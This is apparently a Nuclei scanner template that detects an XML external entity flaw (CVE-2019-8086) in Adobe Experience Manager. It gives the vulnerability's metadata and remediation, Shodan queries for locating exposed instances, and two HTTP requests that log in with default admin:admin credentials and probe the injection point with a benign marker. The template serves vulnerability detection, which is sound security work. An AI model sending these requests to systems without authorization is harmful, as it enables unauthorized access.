id: CVE-2019-8086 info: name: Adobe Experience Manager - XML External Entity Injection author: DhiyaneshDk severity: high description: Adobe Experience Manager 6.5, 6.4, 6.3 and 6.2 are susceptible to XML external entity injection. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. impact: | Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information, server-side request forgery, and potential remote code execution. remediation: | Apply the necessary security patches provided by Adobe to mitigate the vulnerability. Additionally, ensure that the server is properly configured to restrict access to sensitive files and prevent XXE attacks. reference: - https://speakerdeck.com/0ang3el/a-hackers-perspective-on-aem-applications-security?slide=13 - https://github.com/0ang3el/aem-hacker/blob/master/aem_hacker.py - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2019-8086 - https://nvd.nist.gov/vuln/detail/CVE-2019-8086 - https://helpx.adobe.com/security/products/experience-manager/apsb19-48.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2019-8086 cwe-id: CWE-611 epss-score: 0.09189 epss-percentile: 0.94079 cpe: cpe:2.3:a:adobe:experience_manager:6.2:*:*:*:*:*:*:* metadata: max-request: 2 vendor: adobe product: experience_manager shodan-query: - http.title:"AEM Sign In" - http.component:"Adobe Experience Manager" tags: cve,cve2019,aem,adobe http: - raw: - | POST /content/{{randstr}} HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded Authorization: Basic YWRtaW46YWRtaW4= Referer: {{BaseURL}} sling:resourceType=fd/af/components/guideContainer - | POST /content/{{randstr}}.af.internalsubmit.json HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded Authorization: Basic YWRtaW46YWRtaW4= Referer: {{BaseURL}} guideState={"guideState"%3a{"guideDom"%3a{},"guideContext"%3a{"xsdRef"%3a"","guidePrefillXml"%3a"\u0041\u0042\u0043"}}} matchers-condition: and matchers: - type: word part: body words: - 'ABC' - type: word part: header words: - application/json - type: status status: - 200 # digest: 4a0a004730450221008368d1b81b50d3388ed41acdc91d4123c1608c248690ebf4ec827658549a54ce02207660bcd96e45fd2faa18f16d9bec21ac55a498b69fe26122eb359bb5e46d992e:922c64590222798bb761d5b6d8e72950